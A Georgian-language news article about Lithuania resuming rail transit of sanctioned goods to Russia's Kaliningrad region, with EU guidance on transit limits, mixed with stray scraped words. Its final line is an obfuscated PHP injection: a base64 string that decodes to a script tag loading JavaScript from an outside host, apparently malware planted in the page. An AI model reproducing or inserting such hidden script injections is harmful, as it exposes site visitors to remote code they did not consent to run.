celsiusi
ავერსი საქკაბელი
ლიეტუვამ რუსეთში, კალინინგრადის ოლქში სანქცირებული ტვირთების სარკინიგზო ტრანზიტი განაახლა. ამის შესახებ ლიეტუვის რკინიგზის წარმომადგენელმა, მანტას დუბაუსკასმა განაცხადა.
 
რკინიგზის გახსნის მიუხედავად, კვლავ შეზღუდული იქნება საავტომობილო გადაზიდვები.
 
13 ივლისს ევროკომისიამ გამოაქვეყნა დამატებითი მითითებები ევროკავშირის წევრი ქვეყნებისთვის რუსეთიდან საქონლის ტრანზიტის შესახებ, სადაც მან დაუშვა გარკვეული სანქცირებული საქონლის გადაადგილება კალინინგრადის რეგიონში სარკინიგზო გზით. წევრ სახელმწიფოებს შეუძლიათ, გააკონტროლონ ტრანზიტის მოცულობა გასული სამი წლის საშუალო მონაცემებზე დაყრდნობით, ასევე შეზღუდონ „საქონლის უჩვეულო ნაკადები ან ვაჭრობის სქემები“.
 
ტრანსპორტის რეჟიმის მიუხედავად, ნებისმიერ შემთხვევაში აკრძალულია სანქცირებული სამხედრო და ორმაგი დანიშნულების საქონლისა და ტექნოლოგიების ტრანზიტი. გარდა ამისა, წევრმა სახელმწიფოებმა უნდა უზრუნველყონ, რომ სანქცირებული საქონელი არ შევიდეს ევროკავშირში. რუსეთის წინააღმდეგ ევროკავშირის სანქციების მეხუთე პაკეტის გარდამავალი პერიოდის დასრულების შემდეგ, 18 ივნისიდან ლიეტუვის გავლით აიკრძალა ცემენტის, ალკოჰოლის, ხის, მინის, ალუმინის, ქაღალდის ნაწარმის, თაბაშირის და სხვა რუსული წარმოშობის საქონლის ტრანსპორტირება.
444
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");